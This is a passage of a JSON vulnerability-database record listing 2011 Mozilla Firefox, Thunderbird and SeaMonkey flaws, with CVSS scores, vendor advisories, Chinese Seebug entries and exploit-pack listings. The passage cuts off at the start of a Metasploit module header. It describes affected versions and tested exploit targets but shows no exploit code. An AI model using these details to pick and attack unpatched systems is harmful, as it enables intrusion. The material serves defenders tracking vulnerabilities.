"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:firefox:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:*:*:*:*:*:*:*"]}, {"lastseen": "2020-12-09T19:39:11", "description": "Mozilla Firefox 4.x through 8.0, Thunderbird 5.0 through 8.0, and SeaMonkey before 2.6 allow remote attackers to cause a denial of service (application crash) or possibly have unspecified other impact via an Ogg VIDEO element that is not properly handled after scaling.", "edition": 5, "cvss3": {}, "published": "2011-12-21T04:02:00", "title": "CVE-2011-3665", "type": "cve", "cwe": ["CWE-399"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2011-3665"], "modified": "2017-09-19T01:34:00", "cpe": ["cpe:/a:mozilla:seamonkey:1.0.8", "cpe:/a:mozilla:seamonkey:2.0.6", "cpe:/a:mozilla:seamonkey:1.0.99", "cpe:/a:mozilla:seamonkey:2.0", "cpe:/a:mozilla:seamonkey:2.0.7", "cpe:/a:mozilla:firefox:8.0", "cpe:/a:mozilla:seamonkey:1.1.17", "cpe:/a:mozilla:seamonkey:1.0.2", "cpe:/a:mozilla:seamonkey:1.1.2", "cpe:/a:mozilla:seamonkey:1.5.0.10", "cpe:/a:mozilla:seamonkey:1.1.18", "cpe:/a:mozilla:thunderbird:7.0", "cpe:/a:mozilla:seamonkey:2.0.3", "cpe:/a:mozilla:seamonkey:1.0", "cpe:/a:mozilla:firefox:4.0.1", "cpe:/a:mozilla:seamonkey:1.5.0.9", "cpe:/a:mozilla:seamonkey:2.0.11", "cpe:/a:mozilla:firefox:5.0.1", "cpe:/a:mozilla:seamonkey:1.0.9", "cpe:/a:mozilla:firefox:7.0", "cpe:/a:mozilla:seamonkey:1.1.15", "cpe:/a:mozilla:firefox:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.9", "cpe:/a:mozilla:seamonkey:1.1.10", "cpe:/a:mozilla:seamonkey:1.1.12", "cpe:/a:mozilla:firefox:4.0", "cpe:/a:mozilla:thunderbird:6.0.2", "cpe:/a:mozilla:seamonkey:2.0.8", "cpe:/a:mozilla:seamonkey:1.1.6", "cpe:/a:mozilla:seamonkey:1.1.5", "cpe:/a:mozilla:seamonkey:1.1.4", "cpe:/a:mozilla:firefox:7.0.1", "cpe:/a:mozilla:seamonkey:2.0.4", "cpe:/a:mozilla:seamonkey:2.0.14", "cpe:/a:mozilla:seamonkey:2.5", "cpe:/a:mozilla:thunderbird:7.0.1", "cpe:/a:mozilla:seamonkey:1.0.6", "cpe:/a:mozilla:seamonkey:2.3.3", "cpe:/a:mozilla:firefox:6.0.2", "cpe:/a:mozilla:thunderbird:6.0", "cpe:/a:mozilla:seamonkey:2.0.2", "cpe:/a:mozilla:seamonkey:1.0.4", "cpe:/a:mozilla:seamonkey:2.0.13", "cpe:/a:mozilla:seamonkey:1.0.5", "cpe:/a:mozilla:thunderbird:8.0", "cpe:/a:mozilla:seamonkey:1.0.7", "cpe:/a:mozilla:seamonkey:1.1.11", "cpe:/a:mozilla:seamonkey:1.1.3", "cpe:/a:mozilla:thunderbird:6.0.1", "cpe:/a:mozilla:seamonkey:1.1.1", "cpe:/a:mozilla:seamonkey:1.1.7", "cpe:/a:mozilla:firefox:6.0", "cpe:/a:mozilla:seamonkey:2.0.9", "cpe:/a:mozilla:seamonkey:2.0.5", "cpe:/a:mozilla:seamonkey:2.0.12", "cpe:/a:mozilla:seamonkey:1.5.0.8", "cpe:/a:mozilla:firefox:5.0", "cpe:/a:mozilla:seamonkey:2.0a1pre", "cpe:/a:mozilla:seamonkey:1.1.14", "cpe:/a:mozilla:seamonkey:1.1.16", "cpe:/a:mozilla:seamonkey:2.0a1", "cpe:/a:mozilla:thunderbird:5.0", "cpe:/a:mozilla:seamonkey:1.0.1", "cpe:/a:mozilla:seamonkey:1.0.3", "cpe:/a:mozilla:seamonkey:2.0.10", "cpe:/a:mozilla:seamonkey:1.1", "cpe:/a:mozilla:seamonkey:1.1.19", "cpe:/a:mozilla:seamonkey:2.0.1", "cpe:/a:mozilla:seamonkey:1.1.8", "cpe:/a:mozilla:seamonkey:2.1", "cpe:/a:mozilla:seamonkey:1.1.13"], "id": "CVE-2011-3665", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-3665", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:mozilla:seamonkey:1.1.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.3.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:beta_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:beta:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.99:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta7:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.17:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.14:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha3:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.10:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:1.1.10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.18:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.15:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.16:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.12:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:alpha:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:8.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:dev:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta6:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:beta:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.19:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.5:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.8:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta10:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta5:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:6.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0a1:*:pre:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta12:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta8:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.7:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.1:alpha2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.11:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0:alpha:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta4:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta9:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_1:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:alpha_2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta11:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.5.0.9:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:firefox:4.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.6:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:5.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:1.1.13:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:thunderbird:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0a1pre:*:*:*:*:*:*:*", "cpe:2.3:a:mozilla:seamonkey:2.0.13:*:*:*:*:*:*:*"]}], "securityvulns": [{"lastseen": "2018-08-31T11:09:45", "bulletinFamily": "software", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3666", "CVE-2011-3664", "CVE-2011-3658", "CVE-2011-3665"], "description": "Memory corruptions, protection bypass, integer overflows, DoS conditions.", "edition": 1, "modified": "2012-01-02T00:00:00", "published": "2012-01-02T00:00:00", "id": "SECURITYVULNS:VULN:12122", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:12122", "title": "Mozilla Firefox / Thunderbird / Seamonkey multiple security vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "mozilla": [{"lastseen": "2016-09-05T13:37:39", "bulletinFamily": "software", "cvelist": ["CVE-2011-3661"], "edition": 1, "description": "Security researcher Aki Helin reported a crash\nin the YARR regular expression library that could be triggered by\njavascript in web content.\n\nThe YARR library was not used in older versions of\nthe Mozilla browser engine. This vulnerability does not affect\nFirefox 3.6 or Thunderbird 3.1", "modified": "2011-12-20T00:00:00", "published": "2011-12-20T00:00:00", "id": "MFSA2011-54", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2011-54/", "type": "mozilla", "title": "Potentially exploitable crash in the YARR regular expression library", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-05T13:37:52", "bulletinFamily": "software", "cvelist": ["CVE-2011-3663"], "description": "Security researcher Mario Heiderich reported it was\npossible to use SVG animation accessKey events to detect\nkey strokes even when JavaScript was disabled. Since web pages can normally\ndetect key events through script and most users have scripting enabled this\ndoes not present a risk for most users. In contexts where the user knows\nscripting is disabled (reading mail, for example, or NoScript users) this\ncould allow a malicious web page to fool a user into interacting with\na prompt thinking it came from the browser or mail program.\n\n\nAccessing remote content is disabled by default When reading mail in\nThunderbird and SeaMonkey. Successfully capturing keystrokes remotely would\nrequire some social engineering to convince the user to turn it on.\n\n\nSVG animation is not supported in Thunderbird 3.1 or Firefox 3.6.", "edition": 1, "modified": "2011-12-20T00:00:00", "published": "2011-12-20T00:00:00", "id": "MFSA2011-56", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2011-56/", "type": "mozilla", "title": "Key detection without JavaScript via SVG animation", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-05T13:37:36", "bulletinFamily": "software", "cvelist": ["CVE-2011-3658"], "edition": 1, "description": "Security researcher regenrecht reported via\nTippingPoint's Zero Day Initiative that a flaw in the Mozilla SVG\nimplementation could result in an out-of-bounds memory access if\nSVG elements were removed during a DOMAttrModified event handler.\n\nThis vulnerability does not affect products prior to Firefox 8\nand SeaMonkey 2.5. Thunderbird 8 users would be vulnerable only if\nusing a browser-like feature that allowed scripts to run; users\nare not at risk while reading mail.", "modified": "2011-12-20T00:00:00", "published": "2011-12-20T00:00:00", "id": "MFSA2011-55", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2011-55/", "type": "mozilla", "title": "nsSVGValue out-of-bounds access", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-05T13:37:49", "bulletinFamily": "software", "cvelist": ["CVE-2011-3660"], "edition": 1, "description": "Mozilla developers identified and fixed several memory safety bugs\nin the browser engine used in Firefox and other Mozilla-based\nproducts. Some of these bugs showed evidence of memory corruption\nunder certain circumstances, and we presume that with enough effort at\nleast some of these could be exploited to run arbitrary code.\nIn general these flaws cannot be exploited through email in the Thunderbird\nand SeaMonkey products because scripting is disabled, but are potentially a risk\nin browser or browser-like contexts in those products.\nThese vulnerabilities did not affect the older browser engine used\nprior to Firefox 4.", "modified": "2011-12-20T00:00:00", "published": "2011-12-20T00:00:00", "id": "MFSA2011-53", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2011-53/", "type": "mozilla", "title": "Miscellaneous memory safety hazards (rv:9.0)", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-05T13:37:47", "bulletinFamily": "software", "cvelist": ["CVE-2011-3665"], "edition": 1, "description": "sczimmer reported a crash when scaling an OGG\n<video> element to extreme sizes.\n\nFirefox 3.6 is not affected by this vulnerability", "modified": "2011-12-20T00:00:00", "published": "2011-12-20T00:00:00", "id": "MFSA2011-58", "href": "http://www.mozilla.org/en-US/security/advisories/mfsa2011-58/", "type": "mozilla", "title": "Crash scaling &lt;video&gt; to extreme sizes", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T18:08:19", "description": "BUGTRAQ ID: 51136\r\nCVE ID: CVE-2011-3663\r\n\r\nFirefox\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\u3002Thunderbird\u662f\u4e00\u4e2a\u90ae\u4ef6\u5ba2\u6237\u7aef\uff0c\u652f\u6301IMAP\u3001POP\u90ae\u4ef6\u534f\u8bae\u4ee5\u53caHTML\u90ae\u4ef6\u683c\u5f0f\u3002SeaMonkey\u662f\u5f00\u6e90\u7684Web\u6d4f\u89c8\u5668\u3001\u90ae\u4ef6\u548c\u65b0\u95fb\u7ec4\u5ba2\u6237\u7aef\u3001IRC\u4f1a\u8bdd\u5ba2\u6237\u7aef\u548cHTML\u7f16\u8f91\u5668\u3002\r\n\r\nMozilla Firefox/Thunderbird/SeaMonkey\u5728\u7981\u7528\u4e86JavaScript\u65f6\u4e5f\u53ef\u80fd\u4f7f\u7528SVG\u52a8\u753baccessKey\u4e8b\u4ef6\u76d1\u6d4b\u952e\u76d8\u8bb0\u5f55\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u83b7\u53d6\u654f\u611f\u952e\u76d8\u8bb0\u5f55\u4fe1\u606f\n0\nMozilla Firefox 8.0.1\r\nMozilla Firefox 8.0\r\nMozilla Firefox 7.x\r\nMozilla Firefox 5.x\r\nMozilla Firefox 4.x\r\nMozilla Firefox 3.x\r\nMozilla Thunderbird 3.x\r\nMozilla SeaMonkey 2.x\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMozilla\r\n-------\r\nMozilla\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08mfsa2011-56\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nmfsa2011-56\uff1aMozilla Foundation Security Advisory 2011-56\r\n\r\n\u94fe\u63a5\uff1ahttp://www.mozilla.org/security/announce/2011/mfsa2011-56.html", "published": "2011-12-21T00:00:00", "type": "seebug", "title": "Mozilla Firefox/SeaMonkey SVG\u52a8\u753b\u5143\u7d20\u4fe1\u606f\u6cc4\u9732\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3663"], "modified": "2011-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26094", "id": "SSV:26094", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T17:56:37", "description": "BUGTRAQ ID: 51138\r\nCVE ID: CVE-2011-3658\r\n\r\nFirefox\u662f\u4e00\u6b3e\u975e\u5e38\u6d41\u884c\u7684\u5f00\u6e90WEB\u6d4f\u89c8\u5668\u3002Thunderbird\u662f\u4e00\u4e2a\u90ae\u4ef6\u5ba2\u6237\u7aef\uff0c\u652f\u6301IMAP\u3001POP\u90ae\u4ef6\u534f\u8bae\u4ee5\u53caHTML\u90ae\u4ef6\u683c\u5f0f\u3002SeaMonkey\u662f\u5f00\u6e90\u7684Web\u6d4f\u89c8\u5668\u3001\u90ae\u4ef6\u548c\u65b0\u95fb\u7ec4\u5ba2\u6237\u7aef\u3001IRC\u4f1a\u8bdd\u5ba2\u6237\u7aef\u548cHTML\u7f16\u8f91\u5668\u3002\r\n\r\nMozilla Firefox/Thunderbird/SeaMonkey\u5728SVG\u7684\u5b9e\u73b0\u4e0a\u5b58\u5728\u5185\u5b58\u7834\u574f\u6f0f\u6d1e\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u53ef\u80fd\u5bfc\u81f4\u62d2\u7edd\u670d\u52a1\u3002\n0\nMozilla Firefox 8.0.1\r\nMozilla Firefox 8.0\r\nMozilla Thunderbird 8.0\r\nMozilla SeaMonkey 2.5\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMozilla\r\n-------\r\nMozilla\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08mfsa2011-55\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nmfsa2011-55\uff1aMozilla Foundation Security Advisory 2011-55\r\n\r\n\u94fe\u63a5\uff1ahttp://www.mozilla.org/security/announce/2011/mfsa2011-55.html", "published": "2011-12-21T00:00:00", "type": "seebug", "title": "Mozilla Firefox/Thunderbird/SeaMonkey\u8d8a\u754c\u5185\u5b58\u7834\u574f\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "modified": "2011-12-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-26091", "id": "SSV:26091", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "saint": [{"lastseen": "2016-10-03T15:01:56", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "description": "Added: 05/21/2012 \nCVE: [CVE-2011-3658](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3658>) \nBID: [51138](<http://www.securityfocus.com/bid/51138>) \nOSVDB: [77953](<http://www.osvdb.org/77953>) \n\n\n### Background\n\n[Firefox](<http://www.mozilla.com/en-US/firefox/>) is a freely available web browser for multiple platforms including Windows, Linux, and Mac OS. \n\n### Problem\n\nA flaw in the Mozilla SVG implementation could result in an out-of-bounds memory access and possible remote code execution if SVG elements are removed during a `**DOMAttrModified**` event handler. \n\n### Resolution\n\nUpgrade to [Firefox](<http://www.mozilla.com/firefox/>) 9.0 or higher. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-056/> \n<https://bugzilla.mozilla.org/show_bug.cgi?id=708186> \n\n\n### Limitations\n\nThis exploit has been tested on Mozilla Foundation Firefox 7.0.1 and 8.0.1 on Windows XP SP3 English (DEP OptIn). \n\nThe user must load the exploit page in Firefox. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 1, "modified": "2012-05-21T00:00:00", "published": "2012-05-21T00:00:00", "id": "SAINT:F34BAE967E545D5C5D8C4205A506BC8E", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/firefox_domattrmodified_nssvgvalue", "type": "saint", "title": "Firefox DOMAttrModified nsSVGValue Observer Handling Out-of-bounds Memory Access", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T19:19:24", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "edition": 2, "description": "Added: 05/21/2012 \nCVE: [CVE-2011-3658](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3658>) \nBID: [51138](<http://www.securityfocus.com/bid/51138>) \nOSVDB: [77953](<http://www.osvdb.org/77953>) \n\n\n### Background\n\n[Firefox](<http://www.mozilla.com/en-US/firefox/>) is a freely available web browser for multiple platforms including Windows, Linux, and Mac OS. \n\n### Problem\n\nA flaw in the Mozilla SVG implementation could result in an out-of-bounds memory access and possible remote code execution if SVG elements are removed during a `**DOMAttrModified**` event handler. \n\n### Resolution\n\nUpgrade to [Firefox](<http://www.mozilla.com/firefox/>) 9.0 or higher. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-056/> \n<https://bugzilla.mozilla.org/show_bug.cgi?id=708186> \n\n\n### Limitations\n\nThis exploit has been tested on Mozilla Foundation Firefox 7.0.1 and 8.0.1 on Windows XP SP3 English (DEP OptIn). \n\nThe user must load the exploit page in Firefox. \n\n### Platforms\n\nWindows XP \n \n\n", "modified": "2012-05-21T00:00:00", "published": "2012-05-21T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/firefox_domattrmodified_nssvgvalue", "id": "SAINT:AC6E65EF51EFC8927BA761387238C0F3", "type": "saint", "title": "Firefox DOMAttrModified nsSVGValue Observer Handling Out-of-bounds Memory Access", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-06-04T23:19:39", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "description": "Added: 05/21/2012 \nCVE: [CVE-2011-3658](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3658>) \nBID: [51138](<http://www.securityfocus.com/bid/51138>) \nOSVDB: [77953](<http://www.osvdb.org/77953>) \n\n\n### Background\n\n[Firefox](<http://www.mozilla.com/en-US/firefox/>) is a freely available web browser for multiple platforms including Windows, Linux, and Mac OS. \n\n### Problem\n\nA flaw in the Mozilla SVG implementation could result in an out-of-bounds memory access and possible remote code execution if SVG elements are removed during a `**DOMAttrModified**` event handler. \n\n### Resolution\n\nUpgrade to [Firefox](<http://www.mozilla.com/firefox/>) 9.0 or higher. \n\n### References\n\n<http://www.zerodayinitiative.com/advisories/ZDI-12-056/> \n<https://bugzilla.mozilla.org/show_bug.cgi?id=708186> \n\n\n### Limitations\n\nThis exploit has been tested on Mozilla Foundation Firefox 7.0.1 and 8.0.1 on Windows XP SP3 English (DEP OptIn). \n\nThe user must load the exploit page in Firefox. \n\n### Platforms\n\nWindows XP \n \n\n", "edition": 4, "modified": "2012-05-21T00:00:00", "published": "2012-05-21T00:00:00", "id": "SAINT:2FD041B8ACF64BE9E4D7FD3C80082036", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/firefox_domattrmodified_nssvgvalue", "title": "Firefox DOMAttrModified nsSVGValue Observer Handling Out-of-bounds Memory Access", "type": "saint", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "canvas": [{"lastseen": "2019-05-29T19:48:27", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "description": "**Name**| firefox_nsSVGValue \n---|--- \n**CVE**| CVE-2011-3658 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| firefox_nsSVGValue \n**Notes**| CVE Name: CVE-2011-3658 \nVENDOR: Mozilla \nRepeatability: One Shot \nNote: \nCVE Url: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3658 \nDate public: 09/25/2008 \n\n", "edition": 2, "modified": "2011-12-21T04:02:00", "published": "2011-12-21T04:02:00", "id": "FIREFOX_NSSVGVALUE", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/firefox_nsSVGValue", "title": "Immunity Canvas: FIREFOX_NSSVGVALUE", "type": "canvas", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:24:56", "description": "", "published": "2012-05-08T00:00:00", "type": "packetstorm", "title": "Mozilla Firefox 7 / 8 Out-Of-Bounds Access", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3658"], "modified": "2012-05-08T00:00:00", "id": "PACKETSTORM:112544", "href": "https://packetstormsecurity.com/files/112544/Mozilla-Firefox-7-8-Out-Of-Bounds-Access.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = 